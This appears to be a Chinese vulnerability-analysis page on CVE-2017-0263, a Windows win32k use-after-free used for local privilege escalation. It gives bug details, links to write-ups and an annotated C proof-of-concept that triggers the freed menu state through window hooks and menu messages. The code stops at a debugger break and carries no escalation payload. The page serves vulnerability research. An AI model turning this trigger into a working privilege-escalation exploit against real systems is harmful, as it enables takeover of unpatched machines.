CVE-2017-0263漏洞分析
0x00漏洞信息
漏洞影响:本地提权
漏洞文件:win32kfull.sys
漏洞函数:xxxMNEndMenuState
漏洞原因:释放后重用（Use-After-Free）
漏洞日期:2017年 5月9号
【漏洞分析合集】
0x01漏洞分析
https://xiaodaozhi.com/exploit/71.html
https://bbs.kanxue.com/thread-273313.htm#msg_header_h2_2
https://bbs.kanxue.com/thread-263914.htm#msg_header_h1_5
https://zhuanlan.zhihu.com/p/183165861
0x02验证poc
// Trigger harness for the use-after-free that this page attributes to
// win32kfull!xxxMNEndMenuState (CVE-2017-0263).  The listing only drives the
// freed reference through the user-mode menu/hook APIs and then stops at a
// breakpoint; it carries no privilege-escalation payload.  The linked
// write-ups explain why this particular ordering of events reaches the bug.
// Build note: string literals such as LoadLibrary("win32u") are narrow, so
// the project is presumably built without UNICODE defined — confirm.
#include <Windows.h>
#include <wingdi.h>
#include <iostream>   // not used by anything below
#include <Psapi.h>    // not used by anything below
#pragma comment(lib, "psapi.lib")

// Signature assumed for the win32u export resolved at runtime below.
typedef NTSTATUS(NTAPI* myfull) ();

// Replacement window procedure installed on the third "SysShadow" window.
// On WM_NCDESTROY it calls the win32u export NtUserMNDragLeave, then always
// forwards to DefWindowProcW.
// Review notes: LoadLibrary/GetProcAddress run on EVERY message and the
// module handle is never released; the resolved pointer is called without a
// NULL check, so a failed lookup becomes a call through NULL.
LRESULT WINAPI xxShadowWindowProc(
    _In_ HWND hwnd,
    _In_ UINT msg,
    _In_ WPARAM wParam,
    _In_ LPARAM lParam
)
{
    HINSTANCE LibHandle;
    LibHandle = LoadLibrary("win32u");
    myfull funtion = (myfull)GetProcAddress(LibHandle, "NtUserMNDragLeave");
    if (msg == WM_NCDESTROY) {
        funtion();
    }
    return DefWindowProcW(hwnd, msg, wParam, lParam);
}

// State shared by the WH_CALLWNDPROC hook.  The hook is installed for the
// calling thread only (see SetWindowsHookExW below), so these are only ever
// touched from that thread.
int iShadowCount = 0;     // number of "SysShadow" windows seen so far
HWND hwndMenuHit = 0;     // most recent popup-menu ("#32768") window

// WH_CALLWNDPROC hook.  Only WM_NCCREATE is of interest: it records the popup
// menu window, and on each shadow window either swaps in xxShadowWindowProc
// (third shadow) or toggles the menu window hidden/visible (others).
// Note: the (LONG) cast of a function pointer only round-trips on 32-bit
// builds; on 64-bit builds it truncates the pointer.
LRESULT CALLBACK xxWindowHookProc(INT code, WPARAM wParam, LPARAM lParam)
{
    // For WH_CALLWNDPROC, lParam points at a CWPSTRUCT describing the message.
    tagCWPSTRUCT* cwp = (tagCWPSTRUCT*)lParam;
    if (cwp->message != WM_NCCREATE) {
        return CallNextHookEx(0, code, wParam, lParam);
    }
    // 0x20 WCHARs of storage, at most 0x14 requested, so the buffer cannot
    // overflow here.
    WCHAR szTemp[0x20] = { 0 };
    GetClassNameW(cwp->hwnd, szTemp, 0x14);
    if (!wcscmp(szTemp, L"#32768")) {           // popup menu window class
        hwndMenuHit = cwp->hwnd;
    }
    if (!wcscmp(szTemp, L"SysShadow") && hwndMenuHit != NULL) {   // menu drop-shadow window
        if (++iShadowCount == 3) {
            SetWindowLongW(cwp->hwnd, GWLP_WNDPROC, (LONG)xxShadowWindowProc);
        }
        else {
            // Hide then immediately re-show the menu window.
            SetWindowPos(hwndMenuHit, NULL, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE | SWP_NOZORDER | SWP_HIDEWINDOW);
            SetWindowPos(hwndMenuHit, NULL, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE | SWP_NOZORDER | SWP_SHOWWINDOW);
        }
    }
    return CallNextHookEx(0, code, wParam, lParam);
}

int iMenuCreated = 0;     // number of EVENT_SYSTEM_MENUPOPUPSTART events seen
#define MN_ENDMENU 0x1F3  // undocumented menu-window message used below

// WinEvent hook for EVENT_SYSTEM_MENUPOPUPSTART.  The first popup gets a
// synthetic left-button-down at client (2,2); the second popup triggers a
// debugger break and is then told to end via MN_ENDMENU.
// __debugbreak() raises a breakpoint exception, so this is meant to be run
// with a debugger attached.
VOID CALLBACK xxWindowEventProc(
    HWINEVENTHOOK hWinEventHook,
    DWORD event,
    HWND hwnd,
    LONG idObject,
    LONG idChild,
    DWORD idEventThread,
    DWORD dwmsEventTime
)
{
    if (++iMenuCreated == 2) {
        __debugbreak();
        SendMessageW(hwnd, MN_ENDMENU, 0, 0);
    }
    else {
        // wParam 1 = MK_LBUTTON; lParam packs x=2 (low word), y=2 (high word).
        SendMessageW(hwnd, WM_LBUTTONDOWN, 1, 0x00020002); // (2,2)
    }
}

// Worker thread: builds two nested popup menus (auto-dismiss, modeless,
// drag-drop), creates a 1x1 layered/topmost tool window to own them, installs
// the thread-local message hook and WinEvent hook, tracks the outer menu and
// then pumps messages until WM_QUIT.
// Review notes: return values of the create/register/hook calls are not
// checked; the hooks, menus and window are never released (the process exit
// at the end of main is relied on for cleanup); `wndClass = { 0 };` repeats
// the zero-initialisation already done by the declaration.
static DWORD WINAPI xxTrackExploitEx(LPVOID lpThreadParameter)
{
    LPCSTR szMenuItem = "item";
    MENUINFO mi = { 0 };
    mi.cbSize = sizeof(mi);
    mi.fMask = MIM_STYLE;
    mi.dwStyle = MNS_AUTODISMISS | MNS_MODELESS | MNS_DRAGDROP;
    HMENU hpopupMenu[2] = { 0 };
    hpopupMenu[0] = CreatePopupMenu();
    hpopupMenu[1] = CreatePopupMenu();
    SetMenuInfo(hpopupMenu[0], &mi);
    SetMenuInfo(hpopupMenu[1], &mi);
    // hpopupMenu[1] becomes a submenu of hpopupMenu[0]; its own item has no submenu.
    AppendMenuA(hpopupMenu[0], MF_BYPOSITION | MF_POPUP, (UINT_PTR)hpopupMenu[1], szMenuItem);
    AppendMenuA(hpopupMenu[1], MF_BYPOSITION | MF_POPUP, 0, szMenuItem);
    WNDCLASSEXW wndClass = { 0 };
    wndClass = { 0 };
    wndClass.cbSize = sizeof(WNDCLASSEXW);
    wndClass.lpfnWndProc = DefWindowProcW;
    wndClass.cbWndExtra = 0;
    wndClass.hInstance = GetModuleHandleA(NULL);
    wndClass.lpszMenuName = NULL;
    wndClass.lpszClassName = L"WNDCLASSMAIN";
    RegisterClassExW(&wndClass);
    HWND hWindowMain = NULL;
    hWindowMain = CreateWindowExW(WS_EX_LAYERED | WS_EX_TOOLWINDOW | WS_EX_TOPMOST, L"WNDCLASSMAIN", NULL, WS_VISIBLE, 0, 0, 1, 1, NULL, NULL, GetModuleHandleA(NULL), NULL);
    // Both hooks are scoped to this thread (GetCurrentThreadId()).
    SetWindowsHookExW(WH_CALLWNDPROC, xxWindowHookProc, GetModuleHandleA(NULL), GetCurrentThreadId());
    SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART, // hook: menu popup start
        GetModuleHandleA(NULL), xxWindowEventProc, GetCurrentProcessId(), GetCurrentThreadId(), 0);
    //__debugbreak();
    TrackPopupMenuEx(hpopupMenu[0], 0, 0, 0, hWindowMain, NULL);
    MSG msg = { 0 };
    while (GetMessageW(&msg, NULL, 0, 0)) {
        TranslateMessage(&msg);
        DispatchMessageW(&msg);
    }
    return 0;
}

// Entry point: starts the worker thread and blocks on stdin until a key is
// pressed.  The thread handle is never closed, and the failure path returns
// FALSE (0), so the exit code does not distinguish failure from success.
int main(int argc, char* argv[])
{
    HANDLE hThread = CreateThread(NULL, 0, xxTrackExploitEx, NULL, 0, NULL);
    if (hThread == NULL) {
        return FALSE;
    }
    getchar();
    return 0;
}
从此山高路远,纵马扬鞭。愿往后旅途,三冬暖,春不寒,天黑有灯,下雨有伞。此生尽兴,不负勇往。